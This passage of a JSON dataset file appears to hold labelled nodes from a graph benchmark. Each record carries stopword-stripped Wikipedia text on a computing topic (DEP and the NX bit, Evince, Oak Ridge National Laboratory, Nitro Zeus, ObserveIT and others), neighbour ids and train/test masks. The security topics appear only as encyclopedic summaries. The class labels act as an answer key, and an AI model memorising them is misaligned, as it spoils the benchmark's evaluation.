whether dep enabled disabled particular process viewed processes/details tab windows task manager windows implements software dep without use nx bit microsoft safe structured exception handling safeseh properly compiled applications safeseh checks exception raised program execution exception handler one defined application originally compiled effect protection attacker able add exception handler stored data page unchecked program input nx supported enabled default windows allows programs control pages disallow execution api well section headers pe file api runtime access nx bit exposed win32 api calls virtualalloc ex virtualprotect ex page may individually flagged executable non-executable despite lack previous x86 hardware support executable non-executable page settings provided since beginning pre-nx cpus presence 'executable attribute effect documented function result programmers used properly pe file format section specify executability execution flag existed since beginning format standard linkers always used flag correctly even long nx bit windows able enforce nx bit old programs assuming programmer complied best practices applications work correctly nx actually enforced cases problems microsoft .net runtime problems nx bit updated microsoft xbox although cpu nx bit newer versions xdk set code segment limit beginning kernel .data section code point normal circumstances starting version 51xx change also implemented kernel new xboxes broke techniques old exploits used become tsr however new versions quickly released supporting new version fundamental exploit unaffected code written executed runtime—a jit compiler prominent example—the compiler potentially used produce exploit code e.g using jit spray flagged execution therefore would trapped return-oriented programming allow attacker execute arbitrary code even executable space protection enforced",
    "neighbors": [
      642,
      8066,
      5380,
      6151,
      6664,
      3472,
      1298,
      3603,
      8609,
      8867,
      1702,
      9854,
      6829,
      9646,
      7983,
      5040,
      5176,
      2878,
      2367,
      1474,
      7234,
      3142,
      3270,
      6345,
      1103,
      4562,
      725,
      7421,
      7134,
      6754,
      10851,
      8167,
      8551,
      4841,
      4074,
      10603,
      5356,
      5871,
      7920,
      8944,
      9455,
      499,
      2036,
      1399,
      8700,
      5501,
      2558,
      3071
    ],
    "mask": "Test"
  },
  {
    "node_id": 1821,
    "label": 4,
    "text": "Seal_(emblem):seal emblem seal device making impression wax clay paper medium including embossment paper also impression thus made original purpose authenticate document wrapper one modern envelope cover container package holding valuables objects seal-making device also referred seal matrix die imprint creates seal impression rarely sealing impression made purely relief resulting greater pressure paper high parts matrix touch seal known dry seal cases ink another liquid liquefied medium used another color paper traditional forms dry seal design seal matrix intaglio cut flat surface therefore design impressions made relief raised surface design impression reverse mirror-image matrix especially important script included design often case paper embossed behind matrix impression read way matrix impression relief however engraved gems often carved relief called cameo context giving counter-relief intaglio impression used seals process essentially mould seals always given single impression essentially flat surface medieval europe two-sided seals two matrices often used institutions rulers towns bishops kings make two-sided fully three-dimensional impressions wax tag piece ribbon strip parchment running pendent seal impressions dangled documents authenticated attachment tag sewn otherwise attached single-sided seals treated way jurisdictions consider rubber stamps specified signature-accompanying words seal l.s abbreviation locus sigilli place seal legal equivalent i.e equally effective substitute seal united states word seal sometimes assigned facsimile seal design monochrome color may used variety contexts including architectural settings flags official letterheads thus example great seal united states among uses appears reverse one-dollar bill several seals u.s. states appear respective state flags europe although coats arms heraldic badges may well feature contexts well seals seal design entirety rarely appears graphical emblem used mainly originally intended impression documents study seals known sigillography sphragistics seals used earliest civilizations considerable importance archaeology art history ancient mesopotamia carved engraved cylinder seals stone materials used could rolled along create impression clay could repeated indefinitely used labels consignments trade goods purposes normally hollow presumed worn string chain round neck many images often finely carved writing others ancient egypt seals form signet-rings see including names kings found tend show names hieroglyphics recently seals come light south arabia datable himyarite age one example shows name written aramaic yitsḥaq bar ḥanina engraved reverse read correctly impression beginning 3rd millennium bc middle ages seals various kinds production aegean islands mainland greece early minoan age formed soft stone ivory show particular characteristic forms middle minoan age new set seal forms motifs materials appear hard stone requires new rotary carving techniques late bronze age time par excellence lens-shaped seal seal ring continued archaic classical hellenistic periods form pictorial engraved gems major luxury art form became keenly collected king mithridates vi pontus first major collector according pliny elder collection fell booty pompey great deposited temple rome engraved gems continued produced collected 19th century pliny also explained significance signet ring time ring worn little finger known yinzhang china injang korea inshō japan ấn giám ấn chương vietnam seals used east asia form written identification since qin dynasty 221 bc– seals han dynasty impressed soft clay tang dynasty red ink made cinnabar normally used even modern times seals often known chops local colloquial english still commonly used instead handwritten signatures authenticate official documents financial transactions individuals organizations official seals often multiple seals different sizes styles different situations east asian seals usually bear names people organizations represented also bear poems personal mottoes sometimes types seals large seals bear names mottoes used authenticate official documents seals important east asia foreigners frequently conduct business also commission engraving personal seals east asian seals carved variety hard materials including wood soapstone sea glass jade east asian seals traditionally used red oil-based paste consisting finely ground cinnabar contrasts black ink traditionally used ink brush red chemical inks commonly used modern times sealing documents seal engraving considered form calligraphy east asia like ink-brush calligraphy several styles engraving engraving styles emulate calligraphy styles many styles highly stylized characters represented seal difficult untrained readers identify seal engravers considered artists past several famous calligraphers also became famous engravers seals carved famous engravers owned famous artists political leaders become valuable historical works art seals commissioned individuals carved artists every seal unique engravers often personalize seals create materials seals styles engraving typically matched personalities owners seals traditional modern conservative expressive seals sometimes carved owners zodiac animals tops seals seals also sometimes carved images calligraphy sides although utilitarian instrument daily business east asia westerners non-asians seldom see asian seals except asian paintings calligraphic art traditional paintings taiwan china japan korea rest east asia watercolor paintings silk paper surface red ink seals adhere east asian paintings often bear multiple seals including one two seals artist seals owners paintings east asian seals predecessors block printing direct line descent seals used ancient world used medieval post-medieval europe used legal contexts western world present day seals historically often impressed sealing wax often simply described wax middle ages generally comprised compound two-thirds beeswax one-third kind resin post-medieval period resin ingredients came dominate early middle ages seals lead properly bullae latin common use east west notable exception documents bulls issued papal chancery leaden authentications fell favour western christendom byzantine emperors sometimes issued documents gold seals known golden bulls wax seals used fairly regular basis western royal chanceries end 10th century england wax seals survived earlier date norman conquest although earlier matrices known recovered archaeological contexts earliest gold double-sided matrix found near postwick norfolk dated late 7th century next oldest mid-9th-century matrix bishop ethilwald probably æthelwold bishop east anglia practice sealing wax gradually moved social hierarchy monarchs bishops great magnates petty knights end 12th century ordinary freemen middle 13th century also came used variety corporate bodies including cathedral chapters municipalities monasteries etc. validate acts executed name traditional wax seals continue used certain high-status ceremonial documents 20th century gradually superseded many contexts inked dry embossed seals rubber stamps many instruments formerly required seals validity e.g deeds covenants unusual countries west private citizens use seals central eastern europe however east asia signature alone considered insufficient authenticate document kind business managers well many book-keepers employees personal seals normally containing text name position applied letters invoices issued similar documents europe today plastic self-inking stamps notaries also still use seals daily basis least britain registered notary individual personal seal registered authorities includes name pictorial emblem often animal—the combination found many seals ancient greece seals used primarily authenticate documents specifically carry legal import two main ways seal may attached document may applied directly face paper parchment applied seal may hang loose pendent seal pendent seal may attached cords ribbons sometimes owner livery colors two ends strip tag parchment threaded holes slots cut lower edge document document often folded double point plica provide extra strength alternatively seal may attached narrow strip material document case usually parchment sliced folded tail tongue detached object cases help ensure authenticity maintaining integrity relationship document seal prevent seal reuse forger tries remove applied seal document almost certainly break pendent seal easily detached cutting cords strips parchment forger would great difficulty attaching another document least cords parchment normally knotted inside seal would almost certainly break middle ages majority seals pendent attached legal instruments letters patent i.e open letters conferring rights privileges intended available view case important transactions agreements seals parties arrangement well witnesses might attached document executed would carry several seals governments still attach pendent seals letters patent applied seals contrast originally used seal document closed say document would folded seal applied way item could opened without seal broken applied seals used letters close letters intended recipient parcels indicate whether item opened tampered since left sender well providing evidence item actually sender forgery post-medieval period seals came commonly used way private letters letter writer would fold completed letter pour wax joint formed top page impress ring seal matrix governments sometimes sent letters citizens governmental seal eyes known letters secret wax seals might also used letterlocking techniques ensure intended recipient would read message general seals longer used ways except ceremonial purposes however applied seals also came used legal instruments applied directly face document need break use continues historically majority seals circular design although ovals triangles shield-shapes patterns also known design generally comprised graphic emblem sometimes always incorporating heraldic devices surrounded text legend running around perimeter legend often consisted merely words seal name owner either latin local vernacular language latin word sigillum frequently abbreviated simple occasionally legend took form motto middle ages became customary seals women ecclesiastics given vesica pointed oval shape central emblem often standing figure owner case ecclesiastical seals saint medieval townspeople used wide variety different emblems seals included image relating work sealing wax naturally yellowish pale brownish tone could also artificially colored red green many intermediary variations medieval royal chanceries different colours wax customarily used different functions departments state distinguish grants decrees made perpetuity ephemeral documents matrices pendent seals sometimes accompanied smaller counter-seal would used impress small emblem reverse impression cases seal counter-seal would kept two different individuals order provide element double-checking process authentication sometimes large official seal might custody chancery officials would need counter-sealed individual whose name applied monarch mayor town counter-seal might carried person perhaps secured chain cord later take form signet-ring would necessarily smaller pendent seals double-sided elaborate equally-sized obverses reverses impression would formed pressing sandwich matrices wax firmly together means rollers later lever-press screw press certain medieval seals complex still involving two levels impression side wax would used create scene three-dimensional depth death seal-holder sign continuity son heir might commission new seal employing symbols design-elements used father likely practice factor emergence hereditary heraldry western europe 12th century use seal men wealth position common christian era high functionaries church adopted habit incidental allusion one st. augustine letters 217 victorinus indicates used seal practice spread seems taken granted king clovis beginning merovingian dynasty later ecclesiastical synods require letters bishop seal given priests reason lawfully quit proper diocese ruling enacted chalon-sur-saône 813 pope nicholas century complained bishops dôle reims contra morem contrary custom sent letters unsealed custom bishops possessing seals may date assumed pretty general british museum collection earliest bishop seals preserved william de st-calais bishop durham 1081–96 st. anselm archbishop canterbury 1093–1109 seals also affixed architectural engineering construction documents land survey drawings certify identity licensed professional supervised development depending authority jurisdiction project seals may embossed signed stamped signed certain situations computer generated facsimile original seal validated digital certificate owned professional may attached security protected computer file identities professional seals determine legal responsibility errors omissions cases financial responsibility correction well territory responsibility e.g state minnesota jurisdictions especially canada legal requirement professional engineer seal documents accordance engineering profession act regulations professional engineers may also legally entitled seal document prepare seal identifies work performed direct supervision licensed professional engineer assures document recipient work meets standards expected experienced professionals take personal responsibility judgments decisions importance seal means authentication necessitated authority passed new hands old seal destroyed new one made pope dies first duty cardinal camerlengo obtain possession ring fisherman papal signet see broken similar practice prevailed middle ages often alluded historians seems matter ceremony example death robert holy island bishop durham 1283 chronicler robert greystones reports burial seal publicly broken presence master robert avenel matthew paris gives similar description breaking seal william trumpington abbot st albans 1235 practice less widely attested case medieval laypeople certainly occurred occasion particularly 13th 14th centuries silver seal matrices found graves 12th-century queens france probably deliberately buried means cancelling king james ii england dethroned glorious revolution 1688/9 supposed thrown great seal realm river thames flight france order ensure machinery government would cease function unclear much truth story certainly seal recovered james successors william iii mary used great seal matrix fairly crudely adapted – possibly quite deliberately order demonstrate continuity government related practice destruction found among blacksmiths touchmark stamp used hot metal show made destroyed upon death signet rings flat bezel usually wider rest hoop decorated normally intaglio leave raised relief impression design ring pressed onto soft sealing wax similar material used since ancient times personal seal individual recent times design generally crest made engraving either metal engraved gems generally semiprecious agate frequent material especially carnelian banded agate like sardonyx banding makes impression contrast ground smaller classical engraved gems probably originally worn signet rings seals necklace metal signet rings also cast may cheaper yields weaker material wearing signet rings latin signum meaning sign goes back ancient egypt distinctive personal signature developed antiquity documents needed seal seal pharaoh mentioned book genesis genesis 41:42 removing signet ring hand pharaoh put joseph hand arrayed garments fine linen put gold chain around neck although less common today rarely actually used intended purpose seals signet rings still worn especially among armigerous european cultures used attest authority bearer ring also seen symbol power one explanation inclusion regalia certain monarchies death pope destruction signet ring prescribed act clearing way sede vacante subsequent election new pope signet rings also used souvenir membership attribute e.g. class ring typically bear coat arms crest school alternative one stone one may also initials engraved sign personal stature less noble classes began wearing using signet rings early 13th century 17th century signet rings fell favor upper levels society replaced means mounting carrying signet 18th century though signet rings became popular 19th century men classes wore since least 16th century also pseudo-signet rings engraving reversed mirror image impression read correctly rings used since antiquity spy identification espionage world war ii us air force personnel would privately purchase signet rings hidden compartment would hold small compass hidden message mi9 purchased number signet rings regent street jewelers used conceal compasses expression seal approval refers formal approval regardless whether involves seal external marking authoritative person institute also part formal name certain quality marks",
    "neighbors": [
      8357,
      4711,
      4935,
      9576,
      9334,
      5433,
      3231
    ],
    "mask": "Test"
  },
  {
    "node_id": 1822,
    "label": 9,
    "text": "Evince:evince evince document viewer pdf postscript djvu tiff xps dvi formats designed gnome desktop environment developers evince intended replace multiple gnome document viewers single simple application evince motto sums project aim simply document viewer gnome releases included evince since gnome 2.12 september 2005 evince code consists mainly c small part code interfaces poppler written c++ large number linux distributions – including ubuntu fedora linux mint – include evince default document-viewer evince free open-source software subject requirements gnu general public license version 2 later evince faq highlights meaning word evince show express something clearly evince began rewrite gpdf support programmers started find unwieldy maintain evince quickly surpassed functionality gpdf replaced gpdf ggv september 2005 release gnome 2.12 one time windows version evince included valo-cd collection best windows programs evince incorporates integrated search displays number results found highlights results page users optionally display left sidebar viewer thumbnails pages assist page navigation within document documents support indices evince gives option showing document index quickly moving one section another evince show two pages time left right offers full-screen slide-show views evince allows selection text pdf files allows users highlight copy text documents made scanned images pdf includes ocr data evince used obey drm restrictions pdf files may prevent copying printing converting pdf files however made optional turned default gconf since version 3.18.2 evince allows text highlight annotations documents evince supports many different single multi-page document formats",
    "neighbors": [
      11394,
      2955,
      6413,
      1295,
      8848,
      9872,
      10255,
      3859,
      7450,
      6691,
      6694,
      8621,
      7983,
      8627,
      8628,
      9908,
      823,
      1471,
      3649,
      708,
      2886,
      3015,
      73,
      9418,
      2513,
      4177,
      1112,
      5095,
      7913,
      4459,
      10352,
      3828,
      3189,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1823,
    "label": 3,
    "text": "Oak_Ridge_National_Laboratory:oak ridge national laboratory oak ridge national laboratory ornl american multiprogram science technology national laboratory sponsored u.s. department energy doe administered managed operated ut–battelle federally funded research development center ffrdc contract doe established 1942 ornl largest science energy national laboratory department energy system size annual budget ornl located oak ridge tennessee near knoxville ornl scientific programs focus materials neutron science energy high-performance computing systems biology national security ornl partners state tennessee universities industries solve challenges energy advanced materials manufacturing security physics laboratory home several world top supercomputers including world powerful supercomputer ranked top500 summit leading neutron science nuclear energy research facility includes spallation neutron source high flux isotope reactor ornl hosts center nanophase materials sciences bioenergy science center consortium advanced simulation light-water reactors oak ridge national laboratory managed ut–battelle limited liability partnership university tennessee battelle memorial institute formed 2000 purpose annual budget us 1.65 billion 80 department energy remainder various sources paying use facilities 2012 4,400 staff working ornl 1,600 directly conducting research additional 3,000 guest researchers annually five campuses department energy oak ridge reservation national laboratory y-12 national security complex east tennessee technology park formerly oak ridge gaseous diffusion plant oak ridge institute science education developing oak ridge science technology park although four facilities unrelated national laboratory total area reservation 150 square kilometres 58 sq mi lab takes 18 square kilometres 7 sq mi town oak ridge established army corps engineers part clinton engineer works 1942 isolated farm land part manhattan project war advanced research government managed site university chicago metallurgical laboratory 1943 construction clinton laboratories completed later renamed oak ridge national laboratory site chosen x-10 graphite reactor used show plutonium created enriched uranium enrico fermi colleagues developed world second self-sustaining nuclear reactor fermi previous experiment chicago pile-1 x-10 first reactor designed continuous operation end world war ii demand weapons-grade plutonium fell reactor laboratory 1000 employees longer involved nuclear weapons instead used scientific research 1946 first medical isotopes produced x-10 reactor 1950 almost 20,000 samples shipped various hospitals demand military science fallen dramatically future lab uncertain management lab contracted us government monsanto however withdrew 1947 university chicago re-assumed responsibility december 1947 union carbide carbon co. already operated two facilities oak ridge took control laboratory alvin weinberg named director research ornl 1955 director laboratory 1950 oak ridge school reactor technology established two courses reactor operation safety almost 1000 students graduated much research performed ornl 1950s relating nuclear reactors form energy production propulsion electricity reactors built 1950s rest ornl history combined another project world first light water reactor principles neutron moderation fuel cooling ordinary water direct ancestor modern nuclear power stations us military funded much development nuclear-powered submarines ships us navy us army contracted portable nuclear reactors 1953 heat electricity generation remote military bases reactors designed ornl produced american locomotive company used greenland panama canal zone antarctica united states air force usaf also contributed funding three reactors lab first computers first particle accelerators ornl designed tested nuclear-powered aircraft 1954 proof-of-concept proposed usaf fleet long-range bombers although never flew provision radionuclides x-10 medicine grew steadily 1950s isotopes available ornl western source californium-252 ornl scientists lowered immune systems mice performed world first successful bone marrow transplant early 1960s large push ornl develop nuclear-powered desalination plants deserts met sea provide water project called water peace backed john f. kennedy lyndon b. johnson presented 1964 united nations conference increases cost construction falling public confidence nuclear power caused plan fail health physics research reactor built 1962 used radiation exposure experiments leading accurate dosage limits dosimeters improved radiation shielding 1964 molten-salt reactor experiment began construction reactor operated 1966 1969 six months time move u-235 u-233 fuel proved viability molten salt reactors also producing fuel reactors byproduct reaction high flux isotope reactor built 1965 highest neutron flux reactor time improved upon work x-10 reactor producing medical isotopes well allowing higher fidelity materials research researchers biology division studied effects chemicals mice including petrol fumes pesticides tobacco late 1960s cuts funding led cancellation plans another particle accelerator united states atomic energy commission cut breeder reactor program two-thirds leading downsizing staff 5000 3800 1970s prospect fusion power strongly considered sparking research ornl tokamak called ormak made operational 1971 first tokamak achieve plasma temperature 20 million kelvin success fusion experiments enlarged renamed ormak ii 1973 however experiments ultimately failed lead fusion power plants us atomic energy commission required improved safety standards early 1970s nuclear reactors ornl staff wrote almost 100 requirements covering many factors including fuel transport earthquake resistance 1972 aec held series public hearings emergency cooling requirements highlighted safety requirements became stringent ornl involved analysing damage core three mile island nuclear generating station accident 1979 also 1972 peter mazur biologist ornl froze liquid nitrogen thawed implanted mouse embryos surrogate mother mouse pups born healthy technique popular livestock industry allows embryos valuable cattle transported easily prize cow multiple eggs extracted thus vitro fertilisation many offspring would naturally possible 1974 alvin weinberg director lab 19 years replaced herman postma fusion scientist 1977 construction began 6 metre 20 foot superconducting electromagnets intended control fusion reactions project international effort three electromagnets produced us one japan one switzerland final remaining european states experimentation continued 1980s 1980s brought changes ornl focus efficiency became paramount accelerated climate simulation chamber built applied varying weather conditions insulation test efficacy durability faster real time materials research heat resistant ceramics use truck high-tech car engines performed building upon materials research began nuclear reactors 1950s 1987 high temperature materials laboratory established ornl industry researchers cooperated ceramic alloy projects materials research budget ornl doubled initial uncertainty regarding reagan economic policy less government expenditure 1981 holifield heavy ion research facility 25 mv particle accelerator opened ornl time holifield widest range ion species twice powerful accelerators attracting hundreds guest researchers year department energy concerned pollution surrounding ornl began clean-up efforts burial trenches leaking pipes contaminated groundwater beneath lab radiation tanks sitting idle full waste estimates total cost clean-up hundreds millions us dollars five older reactors subjected safety reviews 1987 ordered deactivated reviews complete 1989 high flux isotope reactor restarted us supply certain medical isotopes depleted 1989 former executive officer american association advancement science alvin trivelpiece became director ornl remained role 2000 1992 whistleblower charles varnadore filed complaints ornl alleging safety violations retaliation superiors administrative law judge ruled varnadore favor secretary labor robert reich overturned ruling however varnadore case saw prime contractor martin marietta cited safety violations ultimately led additional whistleblower protection within doe january 2019 ornl announced major breakthrough capacity automate pu-238 production helped push annual production 50 grams 400 grams moving closer nasa goal 1.5 kilograms per year 2025 order sustain space exploration programs housing built oak ridge located townsite along stores necessary buildings housing segregated separate dorms single men women houses available marrieds dorms tended overcrowded four sinks forty-two women townsite replaced modern city oak ridge ornl conducts research development activities span wide range scientific disciplines many research areas significant overlap researchers often work two fields listed laboratory major research areas described briefly laboratory long history energy research nuclear reactor experiments conducted since end world war ii 1945 availability reactors high-performance computing resources emphasis improving efficiency nuclear reactors present programs develop efficient materials accurate simulations aging reactor cores sensors controls well safety procedures regulatory authorities energy efficiency electricity technologies program eeetp aims improve air quality us reduce dependence foreign oil supplies three key areas research electricity manufacturing mobility electricity division focuses reducing electricity consumption finding alternative sources production buildings account 39 us electricity consumption 2012 key area research program aims create affordable carbon-neutral homes 2020 research also takes place higher efficiency solar panels geothermal electricity heating lower cost wind generators economic environmental feasibility potential hydro power plants fusion another area history research ornl dating back 1970s fusion energy division pursues short-term goals develop components high temperature superconductors high-speed hydrogen pellet injectors suitable materials future fusion research much research behaviour maintenance plasma takes place fusion energy division understanding plasma physics crucial area developing fusion power plant us iter office ornl partners princeton plasma physics laboratory savannah river national laboratory us contribution iter project 9.1 expected excess us 1.6 billion throughout contract oak ridge national laboratory biological research covers genomics computational biology structural biology bioinformatics bioenergy program aims improve efficiency stages biofuel process improve energy security united states program aims make genetic improvements potential biomass used formulate methods refineries accept diverse range fuels improve efficiency energy delivery power plants end users center molecular biophysics conducts research behaviour biological molecules various conditions center hosts projects examine cell walls biofuel production use neutron scattering analyse protein folding simulate effect catalysis conventional quantum scale three neutron sources ornl high flux isotope reactor hfir oak ridge electron linear accelerator orela spallation neutron source hfir provides neutrons stable beam resulting constant nuclear reaction whereas orela sns produce pulses neutrons particle accelerators hfir went critical 1965 used materials research major source medical radioisotopes since 2013 hfir provides world highest constant neutron flux result various upgrades part us non-proliferation effort hfir scheduled switch highly enriched uranium 90 weapons grade low-enriched 3–4 2020 last reactor us berkelium used produce world first sample tennessine produced high flux isotope reactor part international effort hfir likely operate approximately 2060 reactor vessel considered unsafe continued use spallation neutron source sns particle accelerator highest intensity neutron pulses man-made neutron source sns made operational 2006 since upgraded 1 megawatts plans continue 3 megawatts high power neutron pulses permit clearer images targets meaning smaller samples analysed accurate results require fewer pulses oak ridge national laboratory conducts research materials science range areas 2002 2008 ornl partnered caterpillar inc. cat form new material diesel engines withstand large temperature fluctuations new steel named cf8c plus based conventional cf8c stainless steel added manganese nitrogen result better high–temperature properties easier cast similar cost 2003 partners received r 100 award r magazine 2009 received award excellence technology transfer federal laboratory consortium commercialisation steel high-temperature materials lab ornl permits researchers universities private companies government initiatives use facilities lab available free results published private research permitted requires payment separate lab shared equipment user facility one three doe sponsored facilities nano-scale microscopy tomography facilities center nanophase materials sciences cnms researches behaviour fabrication nanomaterials center emphasises discovery new materials understanding underlying physical chemical interactions enable creation nanomaterials 2012 cnms produced lithium-sulfide battery theoretical energy density three five times greater existing lithium ion batteries oak ridge national laboratory provides resources us department homeland security defense programs global security nonproliferation gs n program develops implements policies us based international prevent proliferation nuclear material program developed safeguards nuclear arsenals guidelines dismantling arsenals plans action nuclear material fall unauthorised hands detection methods stolen missing nuclear material trade nuclear material us russia gs n work overlaps homeland security programs office providing detection nuclear material nonproliferation guidelines areas concerning department homeland security include nuclear radiological forensics chemical biological agent detection using mass spectrometry simulations potential national hazards throughout history oak ridge national laboratory site various supercomputers home fastest several occasions 1953 ornl partnered argonne national laboratory build oracle oak ridge automatic computer logical engine computer research nuclear physics chemistry biology engineering oracle 2048 words 80 kibit memory took approximately 590 microseconds perform addition multiplications integers 1960s ornl also equipped ibm 360/91 ibm 360/65 1995 ornl bought intel paragon based computer called intel paragon xp/s 150 performed 154 gigaflops ranked third top500 list supercomputers 2005 jaguar built cray xt3-based system performed 25 teraflops received incremental upgrades xt5 platform performed 2.3 petaflops 2009 recognised world fastest november 2009 november 2010 summit built oak ridge national laboratory 2018 benchedmarked 122.3 petaflops june 2018 summit stands world fasted clocked supercomputer 202,752 cpu cores 27,648 nvidia tesla gpus 250 petabytes storage since 1992 national center computational sciences nccs overseen high performance computing ornl manages oak ridge leadership computing facility contains machines 2012 jaguar upgraded xk7 platform fundamental change gpus used majority processing renamed titan titan performs 17.59 petaflops holds number 1 spot top500 list november 2012 computers include 77 node cluster visualise data larger machines output exploratory visualization environment research science technology everest visualisation room 10 3 metre 30 10 ft wall displays 35 megapixel projections smoky 80 node linux cluster used application development research projects refined tested smoky running larger machines titan 1989 programmers oak ridge national lab wrote first version parallel virtual machine pvm software enables distributed computing machines differing specifications pvm free software become de facto standard distributed computing jack dongarra ornl university tennessee wrote linpack software library linpack benchmarks used calculate linear algebra standard method measuring floating point performance supercomputer used top500 organisation",
    "neighbors": [
      2176,
      3328,
      5767,
      7432,
      10508,
      11661,
      10641,
      6950,
      1454,
      2236,
      8134,
      1480,
      1611,
      2135,
      11613,
      11618,
      1638,
      2664,
      8813,
      6518
    ],
    "mask": "None"
  },
  {
    "node_id": 1824,
    "label": 9,
    "text": "Move_assignment_operator:move assignment operator c++ programming language move assignment operator codice_1 used transferring temporary object existing object move assignment operator like c++ operators overloaded like copy assignment operator special member function move assignment operator explicitly defined compiler generates implicit move assignment operator c++11 newer parameter move assignment operator rvalue reference type object defines move assignment operator move assignment operator different move constructor move assignment operator called existing object move constructor called object created operation thereafter object data longer valid overload move assignment operator signature function must operator= data successfully overload move assignment operator following conditions must met consider following move assignment operator simple string class class string",
    "neighbors": [
      1952
    ],
    "mask": "Test"
  },
  {
    "node_id": 1825,
    "label": 6,
    "text": "Semantic_file_system:semantic file system semantic file systems file systems used information persistence structure data according semantics intent rather location current file systems allows data addressed content associative access traditional hierarchical file-systems tend impose burden example sub-directory layout contradicting user perception files would stored tag-based interface alleviates hierarchy problem enables users query data intuitive fashion semantic file systems raise technical design challenges indexes words tags elementary signs sort created constantly updated maintained cached performance offer desired random multi-variate access files addition underlying mostly traditional block-based filesystem research specifications implementations",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      1737,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      10452,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      10577,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      9180,
      2015,
      1509,
      9189,
      7663,
      11256,
      4601,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 1826,
    "label": 9,
    "text": "Von_Neumann_programming_languages:von neumann programming languages von neumann language programming languages high-level abstract isomorphic copies von neumann architectures current programming languages fit description likely consequence extensive domination von neumann computer architecture past 50 years differences fortran c even java although considerable ultimately constrained three based programming style von neumann computer example java objects executed parallel asynchronous message passing attribute-based declarative addressing java would group isomorphism von neumann programming languages architectures following manner john backus asserted assignment statements von neumann languages split programming two worlds first world consists expressions orderly mathematical space potentially useful algebraic properties computation takes place second world consists statements disorderly mathematical space useful mathematical properties structured programming seen limited heuristic apply space though backus claimed exists computer science vicious cycle long-standing emphasis von neumann languages continued primacy von neumann computer architecture dependency made non-von neumann languages uneconomical thus limited development lack widely available effective non-von neumann languages deprived computer designers motivation intellectual foundation needed develop new computer architectures examples non -von neumann languages apl fp fl j lucid ngl zpl mercury plankalkül many modern processors contain multiple processing cores multi-threaded programming usually efficient way use computational power single program modern processors highly optimized techniques including out-of-order execution complex logic detect done without violating von neumann semantics logical programming model separate instruction data caches widely used making hardware modified harvard architecture logic detect cases optimization fails able slowly execute self-modifying code specialized processors including gpus wide mimd devices general-purpose cpus commonly multiple cores one fast enough many programs fast enough without parallelizing single tasks threads commonly used deal asynchronous inputs outputs especially gui general-purpose cpus technically mimd devices usually hardware designed ground mimd programming referred mimd many widely used programming languages c c++ java ceased strictly von neumann adding support parallel processing form threads however categorically non -von neumann languages also functional languages achieved widespread use",
    "neighbors": [
      9345,
      5029,
      3910,
      6950,
      2216,
      8262,
      10603,
      5677,
      2670,
      6926,
      5168,
      3960,
      2519,
      1976,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1827,
    "label": 4,
    "text": "Nitro_Zeus:nitro zeus nitro zeus project name well funded comprehensive cyber attack plan created mitigation strategy stuxnet malware campaign aftermath unlike stuxnet loaded onto system design phase affect proper operation nitro zeus objectives built system design phase unbeknownst system users built-in feature allows assured effective cyber attack system users information existence raised research interviews carried alex gibney zero days documentary film proposed long term widespread infiltration major iranian systems would disrupt degrade communications power grid vital systems desired cyber attackers achieved electronic implants iranian computer networks project seen one pathway alternatives full-scale war requirement type plan iran nuclear deal signed though functioning implants iran critical scada infrastructure systems likely removed",
    "neighbors": [
      3843,
      4689,
      7515,
      107
    ],
    "mask": "Test"
  },
  {
    "node_id": 1828,
    "label": 2,
    "text": "Bruce_Ellis:bruce ellis bruce ellis born 1960 nicknamed brucee computer scientist bell labs 1980s 90s educated university sydney australia earned first class honours university medal worked basser branch unix 32v work continued bell labs involved development later research versions unix software blit terminal plan 9 bell labs inferno operating systems well ventures network processing froggie recreationally also dabbled computer go computational linguistics rob pike responsible infamous mark v shaney early 1980s leaving bell labs consulting lecturing around world working ozinferno operating system continuation work done research version inferno currently living sydney works include mash shell 64 bit support plan 9 crosscompilers suite various postscript interpreters currently used commercial printer manufacturers currently chief software architect rangboom working plan9 emulation environment 9ee disparate platforms",
    "neighbors": [
      1890,
      5492
    ],
    "mask": "Train"
  },
  {
    "node_id": 1829,
    "label": 4,
    "text": "ObserveIT:observeit observeit insider threat management software company observeit provides insider threat security solutions including employee monitoring user activity monitoring behavioral analytics policy enforcement digital forensics 1,700 customers 87 countries company software deployed primarily financial services healthcare manufacturing tech services telco retail markets co-founders gaby friedlander avi amos founded observeit israel 2006 observeit initially focused remote vendor monitoring expanded monitor potential vendor contractor employee insider threats goal software help organizations streamline insider threat incident investigation process prevent data loss 2014 bain capital ventures invested 20 million observeit opened u.s. headquarters boston leadership ceo mike mckee observeit recently released version 7.5 software april 2006 observeit monitors “ invisible component ” infrastructure – people april 2010 lieberman software observeit partner monitor audit privileged access activity within enterprise january 2012 fujitsu partners observeit bring seamless security monitoring applications enterprises hong kong macau november 2013 observeit unveils observeit 5.6.8 april 2014 observeit appoints paul brady ceo september 2014 observeit releases v5.7 april 2015 observeit receives three awards 2015 security industry global excellence awards may 2015 observeit launches cloudthreat amazon web services security solution september 2015 network world new product week february 2016 observeit introduces first software prevent insider threat march 2018 observeit releases v7.5",
    "neighbors": [
      9929
    ],
    "mask": "Test"
  },
  {
    "node_id": 1830,
    "label": 9,
